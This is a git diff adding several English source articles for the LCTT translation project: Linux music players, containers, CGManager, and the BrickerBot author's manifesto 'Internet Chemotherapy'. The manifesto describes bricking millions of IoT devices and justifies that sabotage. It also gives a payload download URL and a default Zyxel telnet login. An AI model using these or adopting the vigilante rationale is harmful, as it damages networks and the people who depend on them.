本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.linuxandubuntu.com
|
||||
[1]:http://www.linuxandubuntu.com/home/linux-vs-unix
|
||||
[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix_orig.png
|
||||
[3]:http://www.unix.org/what_is_unix.html
|
||||
[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux_orig.png
|
||||
[5]:https://www.linux.com
|
144
sources/tech/20171215 Top 5 Linux Music Players.md
Normal file
144
sources/tech/20171215 Top 5 Linux Music Players.md
Normal file
@ -0,0 +1,144 @@
|
||||
Top 5 Linux Music Players
|
||||
======
|
||||
|
||||
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/live-music.jpg?itok=Ejbo4rf7_)
|
||||
>Jack Wallen rounds up his five favorite Linux music players. Creative Commons Zero
|
||||
>Pixabay
|
||||
|
||||
No matter what you do, chances are you enjoy a bit of music playing in the background. Whether you're a coder, system administrator, or typical desktop user, enjoying good music might be at the top of your list of things you do on the desktop. And, with the holidays upon us, you might wind up with some gift cards that allow you to purchase some new music. If your music format of choice is of a digital nature (mine happens to be vinyl) and your platform is Linux, you're going to want a good GUI player to enjoy that music.
|
||||
|
||||
Fortunately, Linux has no lack of digital music players. In fact, there are quite a few, most of which are open source and available for free. Let's take a look at a few such players, to see which one might suit your needs.
|
||||
|
||||
### Clementine
|
||||
|
||||
I wanted to start out with the player that has served as my default for years. [Clementine][1] offers probably the single best ratio of ease-of-use to flexibility you'll find in any player. Clementine is a fork of the now defunct [Amarok][2] music player, but isn't limited to Linux-only; Clementine is also available for Mac OS and Windows platforms. The feature set is seriously impressive and includes the likes of:
|
||||
|
||||
* Built-in equalizer
|
||||
|
||||
* Customizable interface (display current album cover as background -- Figure 1)
|
||||
|
||||
* Play local music or from Spotify, Last.fm, and more
|
||||
|
||||
* Sidebar for easy library navigation
|
||||
|
||||
* Built-in audio transcoding (into MP3, OGG, Flac, and more)
|
||||
|
||||
* Remote control using [Android app][3]
|
||||
|
||||
* Handy search function
|
||||
|
||||
* Tabbed playlists
|
||||
|
||||
* Easy creation of regular and smart playlists
|
||||
|
||||
* CUE sheet support
|
||||
|
||||
* Tag support
|
||||
|
||||
|
||||
|
||||
|
||||
![Clementine][5]
|
||||
|
||||
|
||||
Figure 1: The Clementine interface might be a bit old-school, but it's incredibly user-friendly and flexible.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
Of all the music players I have used, Clementine is by far the most feature-rich and easy to use. It also includes one of the finest equalizers you'll find on a Linux music player (with 10 bands to adjust). Although it may not enjoy a very modern interface, it is absolutely unmatched for its ability to create and manipulate playlists. If your music collection is large, and you want total control over it, this is the player you want.
|
||||
|
||||
Clementine can be found in the standard repositories and installed from either your distribution's software center or the command line.
|
||||
|
||||
### Rhythmbox
|
||||
|
||||
[Rhythmbox][7] is the default player for the GNOME desktop, but it does function well on other desktops. The Rhythmbox interface is slightly more modern than Clementine and takes a minimal approach to design. That doesn't mean the app is bereft of features. Quite the opposite. Rhythmbox offers gapless playback, Soundcloud support, album cover display, audio scrobbling from Last.fm and Libre.fm, Jamendo support, podcast subscription (from [Apple iTunes][8]), web remote control, and more.
|
||||
|
||||
One very nice feature found in Rhythmbox is plugin support, which allows you to enable features like DAAP Music Sharing, FM Radio, Cover art search, notifications, ReplayGain, Song Lyrics, and more.
|
||||
|
||||
The Rhythmbox playlist feature isn't quite as powerful as that found in Clementine, but it still makes it fairly easy to organize your music into quick playlists for any mood. Although Rhythmbox does offer a slightly more modern interface than Clementine (Figure 2), it's not quite as flexible.
|
||||
|
||||
![Rhythmbox][10]
|
||||
|
||||
|
||||
Figure 2: The Rhythmbox interface is simple and straightforward.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
### VLC Media Player
|
||||
|
||||
For some, [VLC][11] cannot be beat for playing videos. However, VLC isn't limited to the playback of video. In fact, VLC does a great job of playing audio files. For [KDE Neon][12] users, VLC serves as your default for both music and video playback. Although VLC is one of the finest video players on the Linux market (it's my default), it does suffer from some minor limitations with audio--namely the lack of playlists and the inability to connect to remote directories on your network. But if you're looking for an incredibly simple and reliable means to play local files or network mms/rtsp streams VLC is a quality tool.
|
||||
|
||||
VLC does include an equalizer (Figure 3), a compressor, and a spatializer as well as the ability to record from a capture device.
|
||||
|
||||
![VLC][14]
|
||||
|
||||
|
||||
Figure 3: The VLC equalizer in action.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
### Audacious
|
||||
|
||||
If you're looking for a lightweight music player, Audacious perfectly fits that bill. This particular music player is fairly single minded, but it does include an equalizer and a small selection of effects that will please many an audiophile (e.g., Echo, Silence removal, Speed and Pitch, Voice Removal, and more--Figure 4).
|
||||
|
||||
![Audacious ][16]
|
||||
|
||||
|
||||
Figure 4: The Audacious EQ and plugins.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
Audacious also includes a really handy alarm feature, that allows you to set an alarm that will start playing your currently selected track at a user-specified time and duration.
|
||||
|
||||
### Spotify
|
||||
|
||||
I must confess, I use Spotify daily. I'm a subscriber and use it to find new music to purchase--which means I am constantly searching and discovering. Fortunately, there is a desktop client for Spotify (Figure 5) that can be easily installed using the [official Spotify Linux installation instructions][17]. Outside of listening to vinyl, I probably make use of Spotify more than any other music player. It also helps that I can seamlessly jump between the desktop client and the [Android app][18], so I never miss out on the music I enjoy.
|
||||
|
||||
![Spotify][20]
|
||||
|
||||
|
||||
Figure 5: The official Spotify client on Linux.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
The Spotify interface is very easy to use and, in fact, it beats the web player by leaps and bounds. Do not settle for the [Spotify Web Player][21] on Linux, as the desktop client makes it much easier to create and manage your playlists. If you're a Spotify power user, don't even bother with the built-in support for the streaming client in the other desktop apps--once you've used the Spotify Desktop Client, the other apps pale in comparison.
|
||||
|
||||
### The choice is yours
|
||||
|
||||
Other options are available (check your desktop software center), but these five clients (in my opinion) are the best of the best. For me, the one-two punch of Clementine and Spotify gives me the best of all possible worlds. Try them out and see which one best meets your needs.
|
||||
|
||||
Learn more about Linux through the free ["Introduction to Linux"][22] course from The Linux Foundation and edX.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/learn/intro-to-linux/2017/12/top-5-linux-music-players
|
||||
|
||||
作者:[][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com
|
||||
[1]:https://www.clementine-player.org/
|
||||
[2]:https://en.wikipedia.org/wiki/Amarok_(software)
|
||||
[3]:https://play.google.com/store/apps/details?id=de.qspool.clementineremote
|
||||
[4]:https://www.linux.com/files/images/clementinejpg
|
||||
[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/clementine.jpg?itok=_k13MtM3 (Clementine)
|
||||
[6]:https://www.linux.com/licenses/category/used-permission
|
||||
[7]:https://wiki.gnome.org/Apps/Rhythmbox
|
||||
[8]:https://www.apple.com/itunes/
|
||||
[9]:https://www.linux.com/files/images/rhythmboxjpg
|
||||
[10]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/rhythmbox.jpg?itok=GOjs9vTv (Rhythmbox)
|
||||
[11]:https://www.videolan.org/vlc/index.html
|
||||
[12]:https://neon.kde.org/
|
||||
[13]:https://www.linux.com/files/images/vlcjpg
|
||||
[14]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/vlc.jpg?itok=hn7iKkmK (VLC)
|
||||
[15]:https://www.linux.com/files/images/audaciousjpg
|
||||
[16]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/audacious.jpg?itok=9YALPzOx (Audacious )
|
||||
[17]:https://www.spotify.com/us/download/linux/
|
||||
[18]:https://play.google.com/store/apps/details?id=com.spotify.music
|
||||
[19]:https://www.linux.com/files/images/spotifyjpg
|
||||
[20]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/spotify.jpg?itok=P3FLfcYt (Spotify)
|
||||
[21]:https://open.spotify.com/browse/featured
|
||||
[22]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
335
sources/tech/20171218 Internet Chemotherapy.md
Normal file
335
sources/tech/20171218 Internet Chemotherapy.md
Normal file
@ -0,0 +1,335 @@
|
||||
Internet Chemotherapy
|
||||
======
|
||||
|
||||
12/10 2017
|
||||
|
||||
### 1. Internet Chemotherapy
|
||||
|
||||
Internet Chemotherapy was a 13 month project between Nov 2016 - Dec 2017.
|
||||
It has been known under names such as 'BrickerBot', 'bad firmware
|
||||
upgrade', 'ransomware', 'large-scale network failure' and even
|
||||
'unprecedented terrorist actions.' That last one was a little harsh,
|
||||
Fernandez, but I guess I can't please everybody.
|
||||
|
||||
You can download the module which executes the http and telnet-based
|
||||
payloads from this router at http://91.215.104.140/mod_plaintext.py. Due to
|
||||
platform limitations the module is obfuscated single threaded python, but
|
||||
the payloads are in plain view and should be easy to figure out for any
|
||||
programmer worth his/her/hir salt. Take a look at the number of payloads,
|
||||
0-days and techniques and let the reality sink in for a moment. Then
|
||||
imagine what would've happened to the Internet in 2017 if I had been a
|
||||
blackhat dedicated to building a massive DDoS cannon for blackmailing the
|
||||
biggest providers and companies. I could've disrupted them all and caused
|
||||
extraordinary damage to the Internet in the process.
|
||||
|
||||
My ssh crawler is too dangerous to publish. It contains various levels of
|
||||
automation for the purpose of moving laterally through poorly designed
|
||||
ISP networks and taking them over through only a single breached router.
|
||||
My ability to commandeer and secure hundreds of thousands of ISP routers
|
||||
was the foundation of my anti-IoT botnet project as it gave me great
|
||||
visibility of what was happening on the Internet and it gave me an
|
||||
endless supply of nodes for hacking back. I began my non-destructive ISP
|
||||
network cleanup project in 2015 and by the time Mirai came around I was
|
||||
in a good position to react. The decision to willfully sabotage other
|
||||
people's equipment was nonetheless a difficult one to make, but the
|
||||
colossally dangerous CVE-2016-10372 situation ultimately left me with no
|
||||
other choice. From that moment on I was all-in.
|
||||
|
||||
I am now here to warn you that what I've done was only a temporary band-
|
||||
aid and it's not going to be enough to save the Internet in the future.
|
||||
The bad guys are getting more sophisticated, the number of potentially
|
||||
vulnerable devices keep increasing, and it's only a matter of time before
|
||||
a large scale Internet-disrupting event will occur. If you are willing to
|
||||
believe that I've disabled over 10 million vulnerable devices over the 13-
|
||||
month span of the project then it's not far-fetched to say that such a
|
||||
destructive event could've already happened in 2017.
|
||||
|
||||
YOU SHOULD WAKE UP TO THE FACT THAT THE INTERNET IS ONLY ONE OR TWO
|
||||
SERIOUS IOT EXPLOITS AWAY FROM BEING SEVERELY DISRUPTED. The damage of
|
||||
such an event is immeasurable given how digitally connected our societies
|
||||
have become, yet CERTs, ISPs and governments are not taking the gravity
|
||||
of the situation seriously enough. ISPs keep deploying devices with
|
||||
exposed control ports and although these are trivially found using
|
||||
services like Shodan the national CERTs don't seem to care. A lot of
|
||||
countries don't even have CERTs. Many of the world's biggest ISPs do not
|
||||
have any actual security know-how in-house, and are instead relying on
|
||||
foreign vendors for help in case anything goes wrong. I've watched large
|
||||
ISPs withering for months under conditioning from my botnet without them
|
||||
being able to fully mitigate the vulnerabilities (good examples are BSNL,
|
||||
Telkom ZA, PLDT, from time to time PT Telkom, and pretty much most large
|
||||
ISPs south of the border). Just look at how slow and ineffective Telkom
|
||||
ZA was in dealing with its Aztech modem problem and you will begin to
|
||||
understand the hopelessness of the current situation. In 99% of the
|
||||
problem cases the solution would have simply been for the ISPs to deploy
|
||||
sane ACLs and CPE segmentation, yet months later their technical staff
|
||||
still hasn't figured this out. If ISPs are unable to mitigate weeks and
|
||||
months of continuous deliberate sabotage of their equipment then what
|
||||
hope is there that they would notice and fix a Mirai problem on their
|
||||
networks? Many of the world's biggest ISPs are catastrophically negligent
|
||||
and this is the biggest danger by a landslide, yet paradoxically it
|
||||
should also be the easiest problem to fix.
|
||||
|
||||
I've done my part to try to buy the Internet some time, but I've gone as
|
||||
far as I can. Now it's up to you. Even small actions are important. Among
|
||||
the things you can do are:
|
||||
|
||||
* Review your own ISP's security through services such as Shodan and take
|
||||
them to task over exposed telnet, http, httpd, ssh, tr069 etc. ports on
|
||||
their networks. Refer them to this document if you have to. There's no
|
||||
good reason why any of these control ports should ever be accessible
|
||||
from the outside world. Exposing control ports is an amateur mistake.
|
||||
If enough customers complain they might actually do something about it!
|
||||
|
||||
* Vote with your wallet! Refuse to buy or use 'intelligent' products
|
||||
unless the manufacturer can prove that the product can and will receive
|
||||
timely security updates. Find out about the vendor's security track
|
||||
record before giving them your hard-earned money. Be willing to pay a
|
||||
little bit more for credible security.
|
||||
|
||||
* Lobby your local politicians and government officials for improved
|
||||
security legislation for IoT (Internet of Things) devices such as
|
||||
routers, IP cameras and 'intelligent' devices. Private or public
|
||||
companies currently lack the incentives for solving this problem in the
|
||||
immediate term. This matter is as important as minimum safety
|
||||
requirements for cars and general electrical appliances.
|
||||
|
||||
* Consider volunteering your time or other resources to underappreciated
|
||||
whitehat organizations such as GDI Foundation or Shadowserver
|
||||
Foundation. These organizations and people make a big difference and
|
||||
they can significantly amplify the impact of your skillset in helping
|
||||
the Internet.
|
||||
|
||||
* Last but not least, consider the long-shot potential of getting IoT
|
||||
devices designated as an 'attractive nuisance' through precedent-
|
||||
setting legal action. If a home owner can be held liable for a
|
||||
burglar/trespasser getting injured then I don't see why a device owner
|
||||
(or ISP or manufacturer) shouldn't be held liable for the damage that
|
||||
was caused by their dangerous devices being exploitable through the
|
||||
Internet. Attribution won't be a problem for Layer 7 attacks. If any
|
||||
large ISPs with deep pockets aren't willing to fund such precedent
|
||||
cases (and they might not since they fear that such precedents could
|
||||
come back to haunt them) we could even crowdfund such initiatives over
|
||||
here and in the EU. ISPs: consider your volumetric DDoS bandwidth cost
|
||||
savings in 2017 as my indirect funding of this cause and as evidence
|
||||
for its potential upside.
|
||||
|
||||
### 2. Timeline
|
||||
|
||||
Here are some of the more memorable events of the project:
|
||||
|
||||
* Deutsche Telekom Mirai disruption in late November 2016. My hastily
|
||||
assembled initial TR069/64 payload only performed a 'route del default'
|
||||
but this was enough to get the ISP's attention to the problem and the
|
||||
resulting headlines alerted other ISPs around the world to the
|
||||
unfolding disaster.
|
||||
|
||||
* Around January 11-12 some Mirai-infected DVRs with exposed control port
|
||||
6789 ended up getting bricked in Washington DC, and this made numerous
|
||||
headlines. Gold star to Vemulapalli for determining that Mirai combined
|
||||
with /dev/urandom had to be 'highly sophisticated ransomware'. Whatever
|
||||
happened to those 2 unlucky souls in Europe?
|
||||
|
||||
* In late January 2017 the first genuine large-scale ISP takedown occurred
|
||||
when Rogers Canada's supplier Hitron carelessly pushed out new firmware
|
||||
with an unauthenticated root shell listening on port 2323 (presumably
|
||||
this was a debugging interface that they forgot to disable). This epic
|
||||
blunder was quickly discovered by Mirai botnets, and the end-result was
|
||||
a large number of bricked units.
|
||||
|
||||
* In February 2017 I noticed the first Mirai evolution of the year, with
|
||||
both Netcore/Netis and Broadcom CLI-based modems being attacked. The
|
||||
BCM CLI would turn out to become one of the main Mirai battlegrounds of
|
||||
2017, with both the blackhats and me chasing the massive long tail of
|
||||
ISP and model-specific default credentials for the rest of the year.
|
||||
The 'broadcom' payloads in the above source may look strange but
|
||||
they're statistically the most likely sequences to disable any of the
|
||||
endless number of buggy BCM CLI firmwares out there.
|
||||
|
||||
* In March 2017 I significantly increased my botnet's node count and
|
||||
started to add more web payloads in response to the threats from IoT
|
||||
botnets such as Imeij, Amnesia and Persirai. The large-scale takedown
|
||||
of these hacked devices created a new set of concerns. For example,
|
||||
among the leaked credentials of the Avtech and Wificam devices there
|
||||
were logins which strongly implied airports and other important
|
||||
facilities, and around April 1 2017 the UK government officials
|
||||
warned of a 'credible cyber threat' to airports and nuclear
|
||||
facilities from 'hacktivists.' Oops.
|
||||
|
||||
* The more aggressive scanning also didn't escape the attention of
|
||||
civilian security researchers, and in April 6 2017 security company
|
||||
Radware published an article about my project. The company trademarked
|
||||
it under the name 'BrickerBot.' It became clear that if I were to
|
||||
continue increasing the scale of my IoT counteroffensive I had to come
|
||||
up with better network mapping/detection methods for honeypots and
|
||||
other risky targets.
|
||||
|
||||
* Around April 11th 2017 something very unusual happened. At first it
|
||||
started like so many other ISP takedowns, with a semi-local ISP called
|
||||
Sierra Tel running exposed Zyxel devices with the default telnet login
|
||||
of supervisor/zyad1234. A Mirai runner discovered the exposed devices
|
||||
and my botnet followed soon after, and yet another clash in the epic
|
||||
BCM CLI war of 2017 took place. This battle didn't last long. It
|
||||
would've been just like any of the hundreds of other ISP takedowns in
|
||||
2017 were it not for something very unusual occurring right after the
|
||||
smoke settled. Amazingly, the ISP didn't try to cover up the outage as
|
||||
some kind of network issue, power spike or a bad firmware upgrade. They
|
||||
didn't lie to their customers at all. Instead, they promptly published
|
||||
a press release about their modems having been vulnerable which allowed
|
||||
their customers to assess their potential risk exposure. What did the
|
||||
most honest ISP in the world get for its laudable transparency? Sadly
|
||||
it got little more than criticism and bad press. It's still the most
|
||||
depressing case of 'why we can't have nice things' to me, and probably
|
||||
the main reason for why 99% of security mistakes get covered up and the
|
||||
actual victims get left in the dark. Too often 'responsible disclosure'
|
||||
simply becomes a euphemism for 'coverup.'
|
||||
|
||||
* On April 14 2017 DHS warned of 'BrickerBot Threat to Internet of
|
||||
Things' and the thought of my own government labeling me as a cyber
|
||||
threat felt unfair and myopic. Surely the ISPs that run dangerously
|
||||
insecure network deployments and the IoT manufacturers that peddle
|
||||
amateurish security implementations should have been fingered as the
|
||||
actual threat to Americans rather than me? If it hadn't been for me
|
||||
millions of us would still be doing their banking and other sensitive
|
||||
transactions over hacked equipment and networks. If anybody from DHS
|
||||
ever reads this I urge you to reconsider what protecting the homeland
|
||||
and its citizens actually means.
|
||||
|
||||
* In late April 2017 I spent some time on improving my TR069/64 attack
|
||||
methods, and in early May 2017 a company called Wordfence (now Defiant)
|
||||
reported a significant decline in a TR069-exploiting botnet that had
|
||||
previously posed a threat to Wordpress installations. It's noteworthy
|
||||
that the same botnet temporarily returned a few weeks later using a
|
||||
different exploit (but this was also eventually mitigated).
|
||||
|
||||
* In May 2017 hosting company Akamai reported in its Q1 2017 State of the
|
||||
Internet report an 89% decrease in large (over 100 Gbps) DDoS attacks
|
||||
compared with Q1 2016, and a 30% decrease in total DDoS attacks. The
|
||||
largest attack of Q1 2017 was 120 Gbps vs 517 Gbps in Q4 2016. As large
|
||||
volumetric DDoS was one of the primary signatures of Mirai this felt
|
||||
like concrete justification for all the months of hard work in the IoT
|
||||
trenches.
|
||||
|
||||
* During the summer I kept improving my exploit arsenal, and in late July
|
||||
I performed some test runs against APNIC ISPs. The results were quite
|
||||
surprising. Among other outcomes a few hundred thousand BSNL and MTNL
|
||||
modems were disabled and this outage became headline news in India.
|
||||
Given the elevated geopolitical tensions between India and China at the
|
||||
time I felt that there was a credible risk of the large takedown being
|
||||
blamed on China so I made the rare decision to publicly take credit
|
||||
for it. Catalin, I'm very sorry for the abrupt '2 day vacation' that
|
||||
you had to take after reporting the news.
|
||||
|
||||
* Previously having worked on APNIC and AfriNIC, on August 9th 2017 I
|
||||
also launched a large scale cleanup of LACNIC space which caused
|
||||
problems for various providers across the subcontinent. The attack made
|
||||
headlines in Venezuela after a few million cell phone users of Movilnet
|
||||
lost service. Although I'm personally against government surveillance
|
||||
of the Internet the case of Venezuela is noteworthy. Many of the
|
||||
LACNIC ISPs and networks have been languishing for months under
|
||||
persistent conditioning from my botnet, but Venezuelan providers have
|
||||
been quick to fortify their networks and secure their infrastructure.
|
||||
I believe this is due to Venezuela engaging in far more invasive deep
|
||||
packet inspection than the other LACNIC countries. Food for thought.
|
||||
|
||||
* In August 2017 F5 Labs released a report called "The Hunt for IoT: The
|
||||
Rise of Thingbots" in which the researchers were perplexed over the
|
||||
recent lull in telnet activity. The researchers speculated that the
|
||||
lack of activity may be evidence that one or more very large cyber
|
||||
weapons are being built (which I guess was in fact true). This piece
|
||||
is to my knowledge the most accurate assessment of the scope of my
|
||||
project but fascinatingly the researchers were unable to put two and
|
||||
two together in spite of gathering all the relevant clues on a single
|
||||
page.
|
||||
|
||||
* In August 2017 Akamai's Q2 2017 State of the Internet report announces
|
||||
the first quarter in 3 years without the provider observing a single
|
||||
large (over 100 Gbps) attack, and a 28% decrease in total DDoS attacks
|
||||
vs Q1 2017. This seems like further validation of the cleanup effort.
|
||||
This phenomenally good news is completely ignored by the mainstream
|
||||
media which operates under an 'if it bleeds it leads' mentality even
|
||||
when it comes to information security. This is yet another reason why
|
||||
we can't have nice things.
|
||||
|
||||
* After the publication of CVE-2017-7921 and 7923 in September 2017 I
|
||||
decided to take a closer look at Hikvision devices, and to my horror
|
||||
I realized that there's a technique for botting most of the vulnerable
|
||||
firmwares that the blackhats hadn't discovered yet. As a result I
|
||||
launched a global cleanup initiative around mid-September. Over a
|
||||
million DVRs and cameras (mainly Hikvision and Dahua) were disabled
|
||||
over a span of 3 weeks and publications such as IPVM.com wrote several
|
||||
articles about the attacks. Dahua and Hikvision wrote press releases
|
||||
mentioning or alluding to the attacks. A huge number of devices finally
|
||||
got their firmwares upgraded. Seeing the confusion that the cleanup
|
||||
effort caused I decided to write a quick summary for the CCTV people at
|
||||
http://depastedihrn3jtw.onion.link/show.php?md5=62d1d87f67a8bf485d43a05ec32b1e6f
|
||||
(sorry for the NSFW language of the pastebin service). The staggering
|
||||
number of vulnerable units that were online months after critical
|
||||
security patches were available should be the ultimate wakeup call to
|
||||
everyone about the utter dysfunctionality of the current IoT patching
|
||||
process.
|
||||
|
||||
* Around September 28 2017 Verisign releases a report saying that DDoS
|
||||
attacks declined 55% in Q2 2017 vs Q1, with a massive 81% attack peak
|
||||
decline.
|
||||
|
||||
* On November 23rd 2017 the CDN provider Cloudflare reports that 'in
|
||||
recent months, Cloudflare has seen a dramatic reduction in simple
|
||||
attempts to flood our network with junk traffic.' Cloudflare speculates
|
||||
it could've partly been due to their change in policies, but the
|
||||
reductions also line up well with the IoT cleanup activities.
|
||||
|
||||
* At the end of November 2017 Akamai's Q3 2017 State of the Internet
|
||||
report sees a small 8% increase in total DDoS attacks for the quarter.
|
||||
Although this was a significant reduction compared to Q3 2016 the
|
||||
slight uptick serves as a reminder of the continued risks and dangers.
|
||||
|
||||
* As a further reminder of the dangers a new Mirai strain dubbed 'Satori'
|
||||
reared its head in November-December of 2017. It's particularly
|
||||
noteworthy how quickly the botnet managed to grow based on a single
|
||||
0-day exploit. This event underlines the current perilous operating
|
||||
state of the Internet, and why we're only one or two severe IoT
|
||||
exploits away from widespread disruption. What will happen when nobody
|
||||
is around to disable the next threat? Sinkholing and other whitehat/
|
||||
'legal' mitigations won't be enough in 2018 just like they weren't
|
||||
enough in 2016. Perhaps in the future governments will be able to
|
||||
collaborate on a counterhacking task force with a global mandate for
|
||||
disabling particularly severe existential threats to the Internet, but
|
||||
I'm not holding my breath.
|
||||
|
||||
* Late in the year there were also some hysterical headlines regarding a
|
||||
new botnet that was dubbed 'Reaper' and 'IoTroop'. I know some of you
|
||||
will eventually ridicule those who estimated its size at 1-2 million
|
||||
but you should understand that security researchers have very limited
|
||||
knowledge of what's happening on networks and hardware that they don't
|
||||
control. In practice the researchers could not possibly have known or
|
||||
even assumed that most of the vulnerable device pool had already been
|
||||
disabled by the time the botnet emerged. Give the 'Reaper' one or two
|
||||
new unmitigated 0-days and it'll become as terrifying as our worst
|
||||
fears.
|
||||
|
||||
### 3. Parting Thoughts
|
||||
|
||||
I'm sorry to leave you in these circumstances, but the threat to my own
|
||||
safety is becoming too great to continue. I have made many enemies. If
|
||||
you want to help look at the list of action items further up. Good luck.
|
||||
|
||||
There will also be those who will criticize me and say that I've acted
|
||||
irresponsibly, but that's completely missing the point. The real point
|
||||
is that if somebody like me with no previous hacking background was able
|
||||
to do what I did, then somebody better than me could've done far worse
|
||||
things to the Internet in 2017. I'm not the problem and I'm not here to
|
||||
play by anyone's contrived rules. I'm only the messenger. The sooner you
|
||||
realize this the better.
|
||||
|
||||
-Dr Cyborkian a.k.a. janit0r, conditioner of 'terminally ill' devices.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via:https://ghostbin.com/paste/q2vq2
|
||||
|
||||
作者:janit0r
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,
|
||||
[Linux中国](https://linux.cn/) 荣誉推出
|
@ -0,0 +1,61 @@
|
||||
Translating by lonaparte
|
||||
|
||||
What Are Containers and Why Should You Care?
|
||||
======
|
||||
What are containers? Do you need them? Why? In this article, we aim to answer some of these basic questions.
|
||||
|
||||
But, to answer these questions, we need more questions. When you start considering how containers might fit into your world, you need to ask: Where do you develop your application? Where do you test it and where is it deployed?
|
||||
|
||||
You likely develop your application on your work laptop, which has all the libraries, packages, tools, and frameworks needed to run that application. It's tested on a platform that resembles the production machine and then it's deployed in production. The problem is that not all three environments are the same; they don't have the same tools, frameworks, and libraries. And, the app that works on your dev machine may not work in the production environment.
|
||||
|
||||
Containers solved that problem. As Docker explains, "a container image is a lightweight, standalone, executable package of a piece of software that includes everything needed to run it: code, runtime, system tools, system libraries, settings."
|
||||
|
||||
What this means is that once an application is packaged as a container, the underlying environment doesn't really matter. It can run anywhere, even on a multi-cloud environment. That's one of the many reasons containers became so popular among developers, operations teams, and even CIOs.
|
||||
|
||||
### Containers for developers
|
||||
|
||||
Now developers or operators don't have to concern themselves with what platforms they are using to run applications. Devs don't have to tell ops that "it worked on my system" anymore.
|
||||
|
||||
Another big advantage of containers is isolation and security. Because containers isolate the app from the platform, the app remains safe and keeps everything around it safe. At the same time, different teams can run different applications on the same infrastructure at the same time -- something that's not possible with traditional apps.
|
||||
|
||||
Isn't that what virtual machines (VMs) offer? Yes and no. VMs do offer isolation, but they have massive overhead. [In a white paper][1], Canonical compared containers with VMs and wrote, "Containers offer a new form of virtualization, providing almost equivalent levels of resource isolation as a traditional hypervisor. However, containers are lower overhead both in terms of lower memory footprint and higher efficiency. This means higher density can be achieved -- simply put, you can get more for the same hardware." Additionally, VMs take longer to provision and start; containers can be spun up in seconds, and they boot instantly.
|
||||
|
||||
### Containers for ecosystem
|
||||
|
||||
A massive ecosystem of vendors and solutions now enable companies to deploy containers at scale, whether it's orchestration, monitoring, logging, or lifecycle management.
|
||||
|
||||
To ensure that containers run everywhere, the container ecosystem came together to form the [Open Container Initiative][2] (OCI), a Linux Foundation project to create specifications around two core components of containers -- container runtime and container image format. These two specs ensure that there won't be any fragmentation in the container space.
|
||||
|
||||
For a long time, containers were specific to the Linux kernel, but Microsoft has been working closely with Docker to bring support for containers on Microsoft's platform. Today you can run containers on Linux, Windows, Azure, AWS, Google Compute Engine, Rackspace, and mainframes. Even VMware is adopting containers with [vSphere Integrated Container][3] (VIC), which lets IT pros run containers and traditional workloads on their platforms.
|
||||
|
||||
### Containers for CIOs
|
||||
|
||||
Containers are very popular among developers for all the reasons mentioned above, and they offer great advantages for CIOs, too. The biggest advantage of moving to containerized workloads is changing the way companies operate.
|
||||
|
||||
Traditional applications have a lifecycle of about a decade. New versions are released after years of work and because they are platform dependent, sometimes they don't see production for years. Due to this lifecycle, developers try to cram in as many features as they can, which can make the application monolithic, big, and buggy.
|
||||
|
||||
This process affects the innovative culture within companies. When people don't see their ideas translated into products for months and years, they are demotivated.
|
||||
|
||||
Containers solve that problem, because you can break the app into smaller microservices. You can develop, test, and deploy in a matter of weeks or days. New features can be added as new containers. They can go into production as soon as they are out of testing. Companies can move faster and stay ahead of the competitors. This approach breeds innovation as ideas can be translated into containers and deployed quickly.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Containers solve many problems that traditional workloads face. However, they are not the answer to every problem facing IT professionals. They are one of many solutions. In the next article, we'll cover some of the basic terminology of containers, and then we will explain how to get started with containers.
|
||||
|
||||
Learn more about Linux through the free ["Introduction to Linux" ][4] course from The Linux Foundation and edX.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/intro-to-Linux/2017/12/what-are-containers-and-why-should-you-care
|
||||
|
||||
作者:[Swapnil Bhartiya][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/arnieswap
|
||||
[1]:https://www.ubuntu.com/containers
|
||||
[2]:https://www.opencontainers.org/
|
||||
[3]:https://www.vmware.com/products/vsphere/integrated-containers.html
|
||||
[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
72
sources/tech/20171218 Whats CGManager.md
Normal file
72
sources/tech/20171218 Whats CGManager.md
Normal file
@ -0,0 +1,72 @@
|
||||
translating---geekpi
|
||||
|
||||
What's CGManager?[][1]
|
||||
============================================================
|
||||
|
||||
CGManager is a central privileged daemon that manages all your cgroups for you through a simple D-Bus API. It's designed to work with nested LXC containers as well as accepting unprivileged requests including resolving user namespaces UIDs/GIDs.
|
||||
|
||||
# Components[][2]
|
||||
|
||||
### cgmanager[][3]
|
||||
|
||||
This daemon runs on the host, mounts cgroupfs into a separate mount namespace (so it's invisible from the host), binds /sys/fs/cgroup/cgmanager/sock for incoming D-Bus queries and generally handles all clients running directly on the host.
|
||||
|
||||
